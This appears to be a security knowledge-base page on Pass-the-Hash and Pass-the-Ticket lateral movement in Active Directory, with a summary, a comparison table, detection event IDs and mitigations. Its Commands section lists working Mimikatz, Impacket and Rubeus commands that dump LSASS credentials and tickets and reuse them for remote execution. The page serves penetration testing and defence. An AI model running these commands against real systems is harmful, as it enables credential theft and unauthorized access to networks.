Nullpath

Pass-the-Hash & Pass-the-Ticket

source active-directorylateral-movementntlmkerberos updated 12 Jun 2026 · 2 min

Pass-the-Hash (PtH) & Pass-the-Ticket (PtT)

Source: raw/pass_the_hash_ticket.md (Gemini research summary)

Summary

Lateral movement techniques that reuse stolen credentials directly, without cracking. PtH (ntlm): an NTLM hash dumped from LSASS/SAM is sufficient to authenticate — the hash is the credential. PtT (kerberos-authentication): a TGT or TGS dumped from LSASS is injected into a new session and reused until it expires (default ~10h).

Comparison

PtHPtT
ProtocolNTLMKerberos
CredentialNTLM hashTGT/TGS
StorageLSASS/SAM/LSA secretsLSASS ticket cache
ExpiryUntil password changeTicket lifetime (~10h)

Key points

  • Prerequisite (both): local admin/SYSTEM on a host where the credential is cached.
  • Tools: Mimikatz, Impacket, psexec.
  • Detection: PtH — Event 4624 Logon Type 3 with NTLM + Key Length 0, Event 4648, NTLM to DCs/SQL from hosts that normally use Kerberos. PtT — 4769 without matching 4768, RC4 downgrade, same Logon ID from multiple source IPs, honeytokens.
  • Mitigations: tiering + PAWs, Protected Users (Kerberos-AES-only, 4h TGT, no caching), Credential Guard, LAPS, disable NTLM, enforce AES Kerberos.

Commands

# Mimikatz — dump hashes/tickets from LSASS (needs local admin/SYSTEM)
privilege::debug
sekurlsa::logonpasswords      # NTLM hashes for logged-on users
sekurlsa::tickets /export      # dump all cached Kerberos tickets to .kirbi

# Pass-the-Hash — spawn a process as another user using their NTLM hash
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<nthash> /run:cmd.exe

# Pass-the-Ticket — inject a stolen .kirbi into the current session
kerberos::ptt ticket.kirbi
# Impacket — pass-the-hash for remote exec / SMB
psexec.py -hashes :<nthash> DOMAIN/Administrator@<target-ip>
wmiexec.py -hashes :<nthash> DOMAIN/Administrator@<target-ip>
smbclient.py -hashes :<nthash> DOMAIN/Administrator@<target-ip>

# Pass-the-Ticket — use a ccache file for Kerberos auth
export KRB5CCNAME=stolen.ccache
psexec.py -k -no-pass corp.local/user@target.corp.local
# Rubeus — dump/triage tickets from LSASS, or monitor for new TGTs
Rubeus.exe dump /service:krbtgt /nowrap
Rubeus.exe ptt /ticket:<base64 ticket>